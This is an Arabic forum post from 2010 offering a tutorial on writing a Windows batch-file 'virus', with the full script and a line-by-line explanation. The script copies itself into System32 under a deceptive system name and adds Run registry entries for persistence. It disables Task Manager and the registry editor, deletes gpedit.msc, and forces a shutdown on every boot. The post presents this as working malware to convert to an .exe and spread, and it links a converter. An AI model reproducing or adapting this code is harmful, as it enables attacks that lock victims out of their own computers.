رجــه ۈ دجــه
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.

رجــه ۈ دجــه

هـڵآ ۈ آڵـڵه نـۈرٺـۈآ آڵمـنـٺـدى ۈ آنـشـآڵـڵـه عـآجـبـڪـم آڵـمـنـٺـدى ۈ شـڪـرن
 
الرئيسيةالبوابةأحدث الصورالتسجيلدخول

 

 تبي تتعلم كيف اسوي الفايروسات ادخل

اذهب الى الأسفل 
كاتب الموضوعرسالة
Šєxџ Đivєℓ
آڵـمـدېـره
آڵـمـدېـره
Šєxџ Đivєℓ


المساهمات : 129
تاريخ التسجيل : 07/01/2010

تبي تتعلم كيف اسوي الفايروسات ادخل Empty
مُساهمةموضوع: تبي تتعلم كيف اسوي الفايروسات ادخل   تبي تتعلم كيف اسوي الفايروسات ادخل I_icon_minitimeالجمعة يناير 08, 2010 10:17 pm

سم الله الــرحمن الــرحيم


ملاحظة هامة جدا للاخوة: لرؤية الكتابات اللي باللغة الانكليزية بشكل صحيح اضغط left shift+left ctrl ببرنامج النوتباد
ثانيا : لواحق الملفات المستخدمة بالشرح هي exe مو بات لأننا راح نحول ملف البات الي exe
نبدأ اولا بشرح مهام الاوامر المستخدمة في الفايرس:
@echo off : وهو أمر مهم لكل ملف بات ومهمته منع اظهار الاوامر المنفذة على نافذة الدوز
If EXIST : وهو امر شرطي بمعنى اذا كان هذا الملف منشأ من قبل
GOTO : معناه اذهب اللى أو نفذ اجراء المعين
If Not EXIST : هو عكس الامر السابق
":shut و :Bull" : أسماء الاجراءات وهذي الاسماء اختيارية
reg add : لاضافة قيمة للريجستري
del: حذف ملف معين
shutdown -s -t 1 : ايقاف تشغيل الجهاز مباشرة
shutdown -r -t 1 : اعادة تشغيل الجهاز مباشرة
%windir% : وهو متغير هام جدا لمعرفة قرص النظام المعين الموجود فيه ملف WINDOWS
لاننا لو كتبنا مثلا : D:\windwos , بدلا من %windir% يمكن يكون قرص النظام هو F أو D وهيك راح يتعطل الفايرس
بعد ما شرحنا الاوامر المهمة وقبل ما أبدأ بالشرح الرئيسي بدي نوه أن هذا الفايرس محتاج أيضا لبعض التعديلات وما في شي كامل , ولكن هدف هذا الموضوع هو مساعدة الاخوة في كيفية التعامل مع الدوال الصعبة في الدوس وخاصة المتعلقة بالريجستري
أولا : طريقة عمل هذا الفايرس :
هذا الفايرس بيقوم بنسخ نفسه نسختان واحدة منهم للتمويه والتانية وهي ملف الفايرس الرئيسي واللي بيشتغل مع تشغيل النظام
وبيعمل شت داون , وحتى يشتغل مع الجهاز لازم نضيف قيمة للملف بالمفتاح RUN الموجود بالريجستري وهذا مساره:
HKLM\software\Microsoft\Windows\CurrentVersion\run
وأما بالنسبة للسيف مود فالملف ما راح يشتغل مع الجهاز وممكن اللي اصيب بالفايرس يدخل بكل بساطة من السيف مود وبعدين للريجستري ويحذف قيمة تشغيل الملف منه لهيك بيقوم الفايرس بتعطيل الريجستري , طيب وال GRUOP POLICY ?
ال GRUOP POLICY هو برنامج يمكنكم الدخول له عن طريق الذهاب الى تشغيل واكتب : gpedit.msc حيث انه اذا كان
الشحص المصاب بالفايرس خبير شوي ممكن يفك تعطيل الريجستري عن طريقه, لهيك راح يقوم الفايرس بحذف ملف gpedit.msc
هيك صار تقريبا الفايرس شبه محمي يعني 78 % محمي وحله الوحيد الFORMAT
ثانيا : كتابة الكود:
انشأ ملف بات فارغ اسمه Blz وانسخ فيه الكود كاملا :
@echo off
if exist %windir%\System32\System111.exe goto shut
if NOT exist %windir%\System32\System111.exe goto Bull
:Bull
copy Blz.exe d:\3.exe
copy Blz.exe %windir%\System32\System111.exe
reg add HKLM\software\Microsoft\Windows\CurrentVersion\run /v BlzOfHK /t REG_SZ /d "d:\3.exe"
reg add HKLM\software\Microsoft\Windows\CurrentVersion\run /v System32 /t REG_SZ /d "d:\windows\System32\system111.exe"
reg add HKCU\software\Microsoft\Windows\CurrentVersion\Pol icies\System /v "DisableTaskMgr" /t REG_DWORD /d 0000001 /f
reg add HKCU\software\Microsoft\Windows\CurrentVersion\Pol icies\System /v "DisableRegistryTools" /t REG_DWORD /d 0000001 /f
del %windir%\system32\gpedit.msc
del Blz.exe
shutdown -r -t 1
shut:
shutdown -s -t 1
سبق وشرحنا مهمة الامر echo off , واما السطر الثاني بالكود فبيقول :
اذا كان الملف system111.exe ( ملف الفايرس ) منشأ في مجلد system32 معناه الجهاز مصاب بالفايرس وما يحتاج لعملية نسخ نفسه و تكوين قيم التشغيل في الريسجتري " اذهب للإجراء Shut وهو اجراء ايقاف التشغيل
واما السطر الثالث فبيقول:
اذا لم يكن الملف system111.exe منشأ في مجلد system32 معناه انه لازم تقوم بعملية بناء الفايرس ونسخ نفسه للمجلد system32 وتكوين قيم الريجستري , وبتكون عملية بناء الفايرس على مراحل هي :
:BULL وهو اسم الاجراء
1) copy Blz.exe d:\3.exe
copy Blz.exe %windir%\System32\System111.exe
وهي نسخ ملف الفايرس ( اللي اسمه Blz) نسختان
2)reg add HKLM\software\Microsoft\Windows\CurrentVersion\run /v BlzOfHK /t REG_SZ /d "d:\3.exe"
انشاء قيمة في الرجستري بالمفتاح run ونوع هذي القيمة REG_SZ" يعني سلسلة واسمها BlzOfHK وبياناتها "d:\3.exe" أي مسار الملف المراد تشغيله
3)reg add HKLM\software\Microsoft\Windows\CurrentVersion\run /v System32 /t REG_SZ /d "d:\windows\System32\system111.exe"
نفس الامر السابق تماما لكن مع تغيير اسم القيمة لاسم متعلق بالنظام ( للخداع فقط) وبياناتها
4)reg add HKCU\software\Microsoft\Windows\CurrentVersion\Pol icies\System /v "DisableTaskMgr" /t REG_DWORD /d 0000001 /f
وهذا الامر هو لتعطيل ال TaskManger وفيه مسار القيمة وبعدين اسمها وهو : "DisableTaskMgr" ونوعها : REG_DWOR" أي قيمة ثنائية و بياناتها , بس لاحظوا آخر الكود السابق وهو /f وهو اختصار لكلمة force أي اجبار الريجستري على انشاء القيم دون التخيير بين نعم ولا وللتوضيح روح للدوز واكتب الكود السابق بدون /f تلاقي الدوس عطاك خياران yes أو No
5) reg add HKCU\software\Microsoft\Windows\CurrentVersion\Pol icies\System /v "DisableRegistryTools" /t REG_DWORD /d 0000001 /f
نفس الكود السابق تماما مع تغيير اسم القيمة فقط ومهمته تعطيل الريجستري
6)del %windir%\system32\gpedit.msc
لحذف ملف gpedit.msc
7)shutdown -r -t 4 : لاعادة التشغيل ولو تلاحظوا عطيناه 4 ثواني حتى يحذف الفايرس نفسه قبل اعادة التشغيل
Cool del Blz.exe : لحذف ملف الفايرس بعد القيام بكل العمليات السابقة
واما الاجراء :shut فهو خارج العمليات السابقة أي مستقل عنها ومهمته ايقاف التشغيل
وأما بالنسبة للتحويل سهلة جدا تفضلوا هذا برنامج التحويل وما يحتاج لشرح:
http://members.lycos.co.uk/zzm1m2007..._Converter.ra
الرجوع الى أعلى الصفحة اذهب الى الأسفل
http://banat-43.heavenforum.com
 
تبي تتعلم كيف اسوي الفايروسات ادخل
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1
 مواضيع مماثلة
-
» انواع الاطفال ادخل اكيد اخوك و اختك منهم

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
رجــه ۈ دجــه :: قــڛــم آڵـهـڪــر-
انتقل الى: